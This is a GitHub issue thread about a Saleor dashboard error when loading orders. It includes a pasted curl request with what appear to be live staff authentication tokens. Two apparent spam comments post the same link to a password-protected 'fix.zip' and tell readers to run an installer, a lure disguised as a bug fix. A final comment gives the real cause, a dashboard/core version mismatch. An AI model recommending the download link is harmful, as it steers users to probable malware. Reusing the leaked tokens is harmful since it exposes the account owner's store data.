### ISSUE TITLE
[Bug]: Error on loading orders from dashboard 

### ISSUE THREAD

**Issue by s3dawyXD** [saleor/saleor-dashboard#5131]
### Description of the issue

error loading order from orders tab in dashboard 
![image](https://github.com/user-attachments/assets/198d1139-6f4d-4e6a-a487-aa66c0492846)

this happened due to this request failed:
`curl 'https://saleor.dummy.com/graphql/' \
  -H 'Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,ar;q=0.7' \
  -H 'Connection: keep-alive' \
  -H 'Cookie: _ga=GA1.1.1282666346.1721238546; _fbp=fb.1.1721238545704.609096975943772785; _ga_MNK5GBNNQG=GS1.1.1721238545.1.0.1721238549.0.0.0; refreshToken=eyJhbGciOiJSUzI1NiIsImtpZCI6IjhGVGVuWnFVQlZia0VxX21WNEdsa3VZcGJxbmxPM3IteWNsM1IzdmM4VGciLCJ0eXAiOiJKV1QifQ.eyJpYXQiOjE3MjQ2NTYxNDEsIm93bmVyIjoic2FsZW9yIiwiaXNzIjoiaHR0cHM6Ly9zYWxlb3Iuc2hlbHRlci10ZWNobm9sb2d5LmNvbS9ncmFwaHFsLyIsImV4cCI6MTcyNzI0ODE0MSwidG9rZW4iOiJFMkVBZm1KM24ySmciLCJlbWFpbCI6ImRldmVsb3BtZW50QHNoZWx0ZXItdGVjaG5vbG9neS5jb20iLCJ0eXBlIjoicmVmcmVzaCIsInVzZXJfaWQiOiJWWE5sY2pveCIsImlzX3N0YWZmIjp0cnVlLCJjc3JmVG9rZW4iOiJvc3ZtbnUyOHowU1VkcjlyTzlvWng3Tkp4SXpUbjhweDdUNVFXNno5VXRDVmJQenRkNWVzNVF1Q3pvY2JQODZDIn0.yE2OfEt-sBhaM9S_i_3dsdr4VbczVm9O8j83dZrm5zmCmkpQesLiFETmgokdw6znZdTmL7_HOua5l46PnvwWu0bjTz5md3ZlsC8e2hwbDz-RZp2JwpZNB6lzbPPNn6GSkf1Q8ZsyKgI5Nf9wfFqA_zGeUctjPEfZ2ZYp_6CtsU-ROcChN2P_9RykJFz6PHu2uxkdhX2COQmv0Lf4R5BYsKuAi2FCWewigC9V93ZMqPhge6J2nOehQwxYS7-un2vNgVDSciuHQ5jB00MGMT7Pj7o90z_vN9oMdUdMkbWcw4JS6vt4Yqww0vci5hMT_2Ny02MMvsdYhK88tcoMwAiHLw' \
  -H 'Origin: https://saleor-dashboard.dummy.com' \
  -H 'Referer: https://saleor-dashboard.dummy.com/' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Site: same-site' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36' \
  -H 'accept: */*' \
  -H 'authorization-bearer: QlZia0VxX21WNEdsa3VZcGJxbmxPM3IteWNsM1IzdmM4VGciLCJ0eXAiOiJKV1QifQ.eyJpYXQiOjE3MjQ2NjE3MzksIm93bmVyIjoic2FsZW9yIiwiaXNzIjoiaHR0cHM6Ly9zYWxlb3Iuc2hlbHRlci10ZWNobm9sb2d5LmNvbS9ncmFwaHFsLyIsImV4cCI6MTcyNDY2MjAzOSwidG9rZW4iOiJFMkVBZm1KM24ySmciLCJlbWFpbCI6ImRldmVsb3BtZW50QHNoZWx0ZXItdGVjaG5vbG9neS5jb20iLCJ0eXBlIjoiYWNjZXNzIiwidXNlcl9pZCI6IlZYTmxjam94IiwiaXNfc3RhZmYiOnRydWV9.uQwWSvyhps7fEAmm2-36Q0fsnoqyT2EA2OTbygx4zFPbDZWCnx2vKs08TgSBszsgMnbOEw8OLXzaXqI5hHY2GWMPLQx2Qrk3oCUmFM39uo0w5IHVDXXoT15il7JptDM_D1-Iup6a0hjvCSAPBuBrUk5uT-p44tUO-0O3ojS6BAjqA-ho6Q5CaFaI71qBr-TrTQuOqhcFbJJ7gtgC-Nks_f40v_gcQXwTIF0eOrktajqBV1uc7n4wGAI6wOkXeO7sJMAfVsI4XUeMaGEfV0Gox8wDjvB4qL5gQLV2VMEMxHYuF26HPFceqI7t37wGJbXbto11s4Z9z8MEzD5oIfnGug' \
  -H 'content-type: application/json' \
  -H 'sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "Linux"' \
  --data-raw $'{"operationName":"OrderDetailsWithMetadata","variables":{"id":"T3JkZXI6N2Y3ZDA4MzYtOGQzMy00YjE2LThhYTctZTk4YTFhYTdkZWRh","isStaffUser":true,"PERMISSION_HANDLE_CHECKOUTS":true,"PERMISSION_HANDLE_PAYMENTS":true,"PERMISSION_HANDLE_TAXES":true,"PERMISSION_IMPERSONATE_USER":true,"PERMISSION_MANAGE_APPS":true,"PERMISSION_MANAGE_CHANNELS":true,"PERMISSION_MANAGE_CHECKOUTS":true,"PERMISSION_MANAGE_DISCOUNTS":true,"PERMISSION_MANAGE_GIFT_CARD":true,"PERMISSION_MANAGE_MENUS":true,"PERMISSION_MANAGE_OBSERVABILITY":true,"PERMISSION_MANAGE_ORDERS":true,"PERMISSION_MANAGE_ORDERS_IMPORT":true,"PERMISSION_MANAGE_PAGES":true,"PERMISSION_MANAGE_PAGE_TYPES_AND_ATTRIBUTES":true,"PERMISSION_MANAGE_PLUGINS":true,"PERMISSION_MANAGE_PRODUCTS":true,"PERMISSION_MANAGE_PRODUCT_TYPES_AND_ATTRIBUTES":true,"PERMISSION_MANAGE_SETTINGS":true,"PERMISSION_MANAGE_SHIPPING":true,"PERMISSION_MANAGE_STAFF":true,"PERMISSION_MANAGE_TAXES":true,"PERMISSION_MANAGE_TRANSLATIONS":true,"PERMISSION_MANAGE_USERS":true},"query":"query OrderDetailsWithMetadata($id: ID\u0021, $isStaffUser: Boolean\u0021) {\\n  order(id: $id) {\\n    ...OrderDetailsWithMetadata\\n    __typename\\n  }\\n  shop {\\n    countries {\\n      code\\n      country\\n      __typename\\n    }\\n    defaultWeightUnit\\n    fulfillmentAllowUnpaid\\n    fulfillmentAutoApprove\\n    availablePaymentGateways {\\n      ...PaymentGateway\\n      __typename\\n    }\\n    __typename\\n  }\\n}\\n\\nfragment OrderDetailsWithMetadata on Order {\\n  ...OrderDetails\\n  fulfillments {\\n    ...FulfillmentWithMetadata\\n    __typename\\n  }\\n  lines {\\n    ...OrderLineWithMetadata\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment OrderDetails on Order {\\n  id\\n  token\\n  ...Metadata\\n  billingAddress {\\n    ...Address\\n    __typename\\n  }\\n  transactions {\\n    ...TransactionItem\\n    __typename\\n  }\\n  payments {\\n    ...OrderPayment\\n    __typename\\n  }\\n  giftCards {\\n    ...OrderGiftCard\\n    __typename\\n  }\\n  grantedRefunds {\\n    ...OrderGrantedRefund\\n    __typename\\n  }\\n  isShippingRequired\\n  canFinalize\\n  created\\n  customerNote\\n  discounts {\\n    ...OrderDiscount\\n    __typename\\n  }\\n  events {\\n    ...OrderEvent\\n    __typename\\n  }\\n  fulfillments {\\n    ...Fulfillment\\n    __typename\\n  }\\n  lines {\\n    ...OrderLine\\n    __typename\\n  }\\n  number\\n  isPaid\\n  paymentStatus\\n  shippingAddress {\\n    ...Address\\n    __typename\\n  }\\n  deliveryMethod {\\n    __typename\\n    ... on ShippingMethod {\\n      id\\n      __typename\\n    }\\n    ... on Warehouse {\\n      id\\n      clickAndCollectOption\\n      __typename\\n    }\\n  }\\n  shippingMethod {\\n    id\\n    __typename\\n  }\\n  shippingMethodName\\n  collectionPointName\\n  shippingPrice {\\n    gross {\\n      amount\\n      currency\\n      __typename\\n    }\\n    __typename\\n  }\\n  status\\n  subtotal {\\n    gross {\\n      ...Money\\n      __typename\\n    }\\n    net {\\n      ...Money\\n      __typename\\n    }\\n    __typename\\n  }\\n  total {\\n    gross {\\n      ...Money\\n      __typename\\n    }\\n    net {\\n      ...Money\\n      __typename\\n    }\\n    tax {\\n      ...Money\\n      __typename\\n    }\\n    __typename\\n  }\\n  totalRemainingGrant {\\n    ...Money\\n    __typename\\n  }\\n  totalGrantedRefund {\\n    ...Money\\n    __typename\\n  }\\n  totalRefundPending {\\n    ...Money\\n    __typename\\n  }\\n  totalRefunded {\\n    ...Money\\n    __typename\\n  }\\n  actions\\n  totalAuthorizePending {\\n    ...Money\\n    __typename\\n  }\\n  totalAuthorized {\\n    ...Money\\n    __typename\\n  }\\n  totalCaptured {\\n    ...Money\\n    __typename\\n  }\\n  totalCharged {\\n    ...Money\\n    __typename\\n  }\\n  totalChargePending {\\n    ...Money\\n    __typename\\n  }\\n  totalCanceled {\\n    ...Money\\n    __typename\\n  }\\n  totalCancelPending {\\n    ...Money\\n    __typename\\n  }\\n  totalBalance {\\n    ...Money\\n    __typename\\n  }\\n  undiscountedTotal {\\n    net {\\n      ...Money\\n      __typename\\n    }\\n    gross {\\n      ...Money\\n      __typename\\n    }\\n    __typename\\n  }\\n  user {\\n    id\\n    email\\n    __typename\\n  }\\n  userEmail\\n  shippingMethods {\\n    id\\n    name\\n    price {\\n      ...Money\\n      __typename\\n    }\\n    active\\n    message\\n    __typename\\n  }\\n  invoices {\\n    ...Invoice\\n    __typename\\n  }\\n  channel {\\n    isActive\\n    id\\n    name\\n    currencyCode\\n    slug\\n    defaultCountry {\\n      code\\n      __typename\\n    }\\n    orderSettings {\\n      markAsPaidStrategy\\n      __typename\\n    }\\n    __typename\\n  }\\n  isPaid\\n  __typename\\n}\\n\\nfragment Metadata on ObjectWithMetadata {\\n  metadata {\\n    ...MetadataItem\\n    __typename\\n  }\\n  privateMetadata {\\n    ...MetadataItem\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment MetadataItem on MetadataItem {\\n  key\\n  value\\n  __typename\\n}\\n\\nfragment Address on Address {\\n  city\\n  cityArea\\n  companyName\\n  country {\\n    __typename\\n    code\\n    country\\n  }\\n  countryArea\\n  firstName\\n  id\\n  lastName\\n  phone\\n  postalCode\\n  streetAddress1\\n  streetAddress2\\n  __typename\\n}\\n\\nfragment TransactionItem on TransactionItem {\\n  ...TransactionBaseItem\\n  pspReference\\n  externalUrl\\n  createdAt\\n  events {\\n    ...TransactionEvent\\n    __typename\\n  }\\n  authorizedAmount {\\n    ...Money\\n    __typename\\n  }\\n  chargedAmount {\\n    ...Money\\n    __typename\\n  }\\n  refundedAmount {\\n    ...Money\\n    __typename\\n  }\\n  canceledAmount {\\n    ...Money\\n    __typename\\n  }\\n  authorizePendingAmount {\\n    ...Money\\n    __typename\\n  }\\n  chargePendingAmount {\\n    ...Money\\n    __typename\\n  }\\n  refundPendingAmount {\\n    ...Money\\n    __typename\\n  }\\n  cancelPendingAmount {\\n    ...Money\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment TransactionBaseItem on TransactionItem {\\n  id\\n  name\\n  actions\\n  events {\\n    ...TransactionBaseEvent\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment TransactionBaseEvent on TransactionEvent {\\n  id\\n  pspReference\\n  amount {\\n    ...Money\\n    __typename\\n  }\\n  externalUrl\\n  type\\n  message\\n  createdAt\\n  __typename\\n}\\n\\nfragment Money on Money {\\n  amount\\n  currency\\n  __typename\\n}\\n\\nfragment TransactionEvent on TransactionEvent {\\n  ...TransactionBaseEvent\\n  createdBy {\\n    ... on User {\\n      ...StaffMemberAvatar\\n      __typename\\n    }\\n    ... on App {\\n      ...AppAvatar\\n      __typename\\n    }\\n    __typename\\n  }\\n  externalUrl\\n  __typename\\n}\\n\\nfragment StaffMemberAvatar on User {\\n  ...StaffMember\\n  avatar(size: 512) {\\n    url\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment StaffMember on User {\\n  id\\n  email\\n  firstName\\n  isActive\\n  lastName\\n  __typename\\n}\\n\\nfragment AppAvatar on App {\\n  id\\n  name\\n  __typename\\n}\\n\\nfragment OrderPayment on Payment {\\n  id\\n  isActive\\n  actions\\n  gateway\\n  paymentMethodType\\n  availableCaptureAmount {\\n    ...Money\\n    __typename\\n  }\\n  capturedAmount {\\n    ...Money\\n    __typename\\n  }\\n  total {\\n    ...Money\\n    __typename\\n  }\\n  availableRefundAmount {\\n    ...Money\\n    __typename\\n  }\\n  modified\\n  transactions {\\n    id\\n    token\\n    created\\n    kind\\n    isSuccess\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment OrderGiftCard on GiftCard {\\n  id\\n  last4CodeChars\\n  events {\\n    id\\n    type\\n    orderId\\n    date\\n    balance {\\n      initialBalance {\\n        ...Money\\n        __typename\\n      }\\n      currentBalance {\\n        ...Money\\n        __typename\\n      }\\n      oldInitialBalance {\\n        ...Money\\n        __typename\\n      }\\n      oldCurrentBalance {\\n        ...Money\\n        __typename\\n      }\\n      __typename\\n    }\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment OrderGrantedRefund on OrderGrantedRefund {\\n  id\\n  createdAt\\n  shippingCostsIncluded\\n  status\\n  amount {\\n    currency\\n    amount\\n    __typename\\n  }\\n  transactionEvents {\\n    id\\n    __typename\\n  }\\n  reason\\n  user {\\n    ...UserBaseAvatar\\n    __typename\\n  }\\n  app {\\n    id\\n    name\\n    __typename\\n  }\\n  lines {\\n    id\\n    quantity\\n    orderLine {\\n      id\\n      __typename\\n    }\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment UserBaseAvatar on User {\\n  id\\n  firstName\\n  lastName\\n  email\\n  avatar {\\n    url\\n    alt\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment OrderDiscount on OrderDiscount {\\n  id\\n  type\\n  name\\n  calculationMode: valueType\\n  value\\n  reason\\n  amount {\\n    ...Money\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment OrderEvent on OrderEvent {\\n  id\\n  amount\\n  shippingCostsIncluded\\n  date\\n  email\\n  emailType\\n  invoiceNumber\\n  discount {\\n    valueType\\n    value\\n    reason\\n    amount {\\n      amount\\n      currency\\n      __typename\\n    }\\n    oldValueType\\n    oldValue\\n    oldAmount {\\n      amount\\n      currency\\n      __typename\\n    }\\n    __typename\\n  }\\n  relatedOrder {\\n    id\\n    number\\n    __typename\\n  }\\n  message\\n  quantity\\n  transactionReference\\n  type\\n  user {\\n    id\\n    email\\n    firstName\\n    lastName\\n    avatar(size: 128) {\\n      url\\n      __typename\\n    }\\n    __typename\\n  }\\n  app {\\n    id\\n    name\\n    appUrl\\n    brand {\\n      logo {\\n        default(size: 128)\\n        __typename\\n      }\\n      __typename\\n    }\\n    __typename\\n  }\\n  lines {\\n    quantity\\n    itemName\\n    discount {\\n      valueType\\n      value\\n      reason\\n      amount {\\n        amount\\n        currency\\n        __typename\\n      }\\n      oldValueType\\n      oldValue\\n      oldAmount {\\n        amount\\n        currency\\n        __typename\\n      }\\n      __typename\\n    }\\n    orderLine {\\n      id\\n      productName\\n      variantName\\n      __typename\\n    }\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment Fulfillment on Fulfillment {\\n  ...Metadata\\n  id\\n  lines {\\n    id\\n    quantity\\n    orderLine {\\n      ...OrderLine\\n      __typename\\n    }\\n    __typename\\n  }\\n  fulfillmentOrder\\n  status\\n  trackingNumber\\n  warehouse {\\n    id\\n    name\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment OrderLine on OrderLine {\\n  id\\n  isShippingRequired\\n  allocations {\\n    id\\n    quantity\\n    warehouse {\\n      id\\n      name\\n      __typename\\n    }\\n    __typename\\n  }\\n  variant {\\n    id\\n    name\\n    quantityAvailable\\n    preorder {\\n      endDate\\n      __typename\\n    }\\n    stocks {\\n      ...Stock\\n      __typename\\n    }\\n    product {\\n      id\\n      isAvailableForPurchase\\n      __typename\\n    }\\n    __typename\\n  }\\n  productName\\n  productSku\\n  isGift\\n  quantity\\n  quantityFulfilled\\n  quantityToFulfill\\n  totalPrice {\\n    ...TaxedMoney\\n    __typename\\n  }\\n  unitDiscount {\\n    amount\\n    currency\\n    __typename\\n  }\\n  unitDiscountValue\\n  unitDiscountReason\\n  unitDiscountType\\n  undiscountedUnitPrice {\\n    currency\\n    gross {\\n      amount\\n      currency\\n      __typename\\n    }\\n    net {\\n      amount\\n      currency\\n      __typename\\n    }\\n    __typename\\n  }\\n  unitPrice {\\n    gross {\\n      amount\\n      currency\\n      __typename\\n    }\\n    net {\\n      amount\\n      currency\\n      __typename\\n    }\\n    __typename\\n  }\\n  thumbnail {\\n    url\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment Stock on Stock {\\n  id\\n  quantity\\n  quantityAllocated\\n  warehouse {\\n    ...Warehouse\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment Warehouse on Warehouse {\\n  id\\n  name\\n  __typename\\n}\\n\\nfragment TaxedMoney on TaxedMoney {\\n  net {\\n    ...Money\\n    __typename\\n  }\\n  gross {\\n    ...Money\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment Invoice on Invoice {\\n  id\\n  number\\n  createdAt\\n  url\\n  status\\n  __typename\\n}\\n\\nfragment FulfillmentWithMetadata on Fulfillment {\\n  ...Fulfillment\\n  lines {\\n    orderLine {\\n      ...OrderLineWithMetadata\\n      __typename\\n    }\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment OrderLineWithMetadata on OrderLine {\\n  ...OrderLine\\n  variant {\\n    metadata {\\n      ...MetadataItem\\n      __typename\\n    }\\n    privateMetadata @include(if: $isStaffUser) {\\n      ...MetadataItem\\n      __typename\\n    }\\n    __typename\\n  }\\n  __typename\\n}\\n\\nfragment PaymentGateway on PaymentGateway {\\n  name\\n  id\\n  __typename\\n}\\n"}'`

and the case for this failure are `status` , `transactionEvents` from  `OrderGrantedRefund` 

### Steps to reproduce the problem

trying to open any order from dashboard it raise an error 

### What did you expect to happen?

order details to be shown 

### Environment

Browser and version: Chrome Version 128.0.6613.84 (Official Build) (64-bit)
OS and version: Linux Mint 21.3 Cinnamon 6.8.0-40-generic
Dashboard version:  v3.20.6
Core version: v3.19.74

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by delemeator** [comment]
It looks like you are using dashboard 3.20 and core 3.19. This is why the schema doesn’t match. You should either upgrade saleor or downgrade dashboard
